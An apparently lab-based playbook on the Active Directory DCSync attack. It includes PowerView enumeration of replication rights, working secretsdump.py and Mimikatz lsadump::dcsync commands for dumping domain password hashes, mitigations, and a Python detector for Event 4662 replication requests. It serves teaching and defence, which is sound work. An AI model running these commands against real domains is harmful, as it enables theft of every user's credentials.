DCSync Attack Playbook

This playbook provides a comprehensive guide on the DCSync attack, its mechanics, detection methods, and mitigation strategies.

What is DCSync?

DCSync is a technique used to steal the Active Directory password database by abusing the Directory Replication Service Remote Protocol (MS-DRSR). It allows an attacker holding replication rights to impersonate a Domain Controller and request the NTLM password hashes of domain users, exactly as a legitimate DC would during replication.

How DCSync Works

  1. The attacker uses an account with domain replication rights.
  2. They request password replication from a Domain Controller using the DS-Replication-Get-Changes-All extended right.
  3. This allows retrieval of NTLM password hashes for any domain user, including previous password hashes.

Required Permissions

To perform a DCSync attack, an account must have:

  • Replicating Directory Changes (the DS-Replication-Get-Changes extended right)
  • Replicating Directory Changes All (the DS-Replication-Get-Changes-All extended right)

Note: Domain/Enterprise Admins and default domain administrators have these rights by default.

Detection and Enumeration

Using PowerView

  1. Identify the user's SID (the example account here is adunn):
     Get-DomainUser -Identity adunn | select samaccountname,objectsid,memberof,useraccountcontrol | fl
  2. Check whether that SID holds replication rights on the domain object:
     $sid = "S-1-5-21-3842939050-3880317879-2865463114-1164"
     Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get') } | ? { $_.SecurityIdentifier -match $sid } | select AceQualifier, ObjectDN, ActiveDirectoryRights, SecurityIdentifier, ObjectAceType | fl

Executing DCSync

Using secretsdump.py (Linux)

secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@<DC-IP>

(Replace <DC-IP> with the IP address or hostname of a Domain Controller; the tool prompts for the account's password.)

Options:

  • -just-dc-ntlm: Extract only NTLM hashes
  • -just-dc-user <USERNAME>: Extract data for a specific user
  • -pwd-last-set: Show password last change date
  • -history: Dump password history
  • -user-status: Show whether each user account is disabled

Using Mimikatz (Windows)

  1. Run PowerShell as the user with DCSync privileges:
     runas /netonly /user:INLANEFREIGHT\adunn powershell
  2. Execute the Mimikatz commands:
     .\mimikatz.exe
     privilege::debug
     lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator

Additional Considerations

  1. Reversible Encryption: Some accounts may have passwords stored using reversible encryption, in which case DCSync returns the cleartext password rather than only a hash. Enumerate these accounts by testing the ENCRYPTED_TEXT_PWD_ALLOWED flag (value 128) in userAccountControl:
     Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
  2. Password Audits: DCSync can be used for legitimate password audits. However, ensure proper authorisation and documentation before running it.

Mitigation Strategies

  1. Limit accounts with replication rights
  2. Implement strong access controls
  3. Monitor for unusual replication requests
  4. Use Advanced Threat Analytics or similar tools to detect DCSync attempts
  5. Regularly audit accounts with sensitive permissions
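As an added example that is not part of the original playbook, the following Python script implements item 3 above on the log side: it scans Windows Security events (Event ID 4662, "An operation was performed on an object") for requests that exercise one of the replication extended rights and alerts when the requester is not a Domain Controller machine account. The flattened key=value event format, the sample events and the allowed_accounts list are constructed for this example; the GUIDs are the well-known schema values for the three replication rights.

```python
import re

# Extended-right GUIDs that a DCSync request exercises (well-known AD schema values).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed sample of Security log events, flattened to one key=value line each (not real telemetry).
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=DC02$ SubjectDomainName=INLANEFREIGHT ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=adunn SubjectDomainName=INLANEFREIGHT ObjectType=domainDNS "
    "Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=adunn SubjectDomainName=INLANEFREIGHT ObjectType=user "
    "Properties={bf967a86-0de6-11d0-a285-00aa003049e2}",
    "EventID=4624 SubjectUserName=adunn SubjectDomainName=INLANEFREIGHT LogonType=3",
]

def parse_event(line: str) -> dict:
    """Split a flattened event line into fields; Properties keeps the whole remainder."""
    head, _, props = line.partition(" Properties=")
    fields = dict(kv.split("=", 1) for kv in head.split() if "=" in kv)
    fields["Properties"] = props
    return fields

def replication_rights(properties: str) -> list:
    """Return the replication extended rights whose GUIDs appear in a 4662 Properties field."""
    guids = re.findall(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", properties.lower())
    return [REPLICATION_GUIDS[g] for g in guids if g in REPLICATION_GUIDS]

def detect_dcsync(lines, allowed_accounts=frozenset()) -> list:
    """Return (DOMAIN\\user, rights) for 4662 replication requests not made by a DC machine account."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue
        account = ev.get("SubjectUserName", "")
        # DCs replicate legitimately under machine accounts (name ends in "$"); allowed_accounts
        # lists any other principal that is authorised to replicate (e.g. a directory sync service).
        if account.endswith("$") or account.lower() in allowed_accounts:
            continue
        alerts.append((f"{ev.get('SubjectDomainName', '')}\\{account}", rights))
    return alerts
```

Event 4662 is only written when the Directory Service Access audit subcategory is enabled and the domain object carries a SACL covering these rights, so confirm both before relying on this detection.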

By following this playbook, organisations can better understand, detect, and mitigate DCSync attacks, enhancing their overall Active Directory security posture.
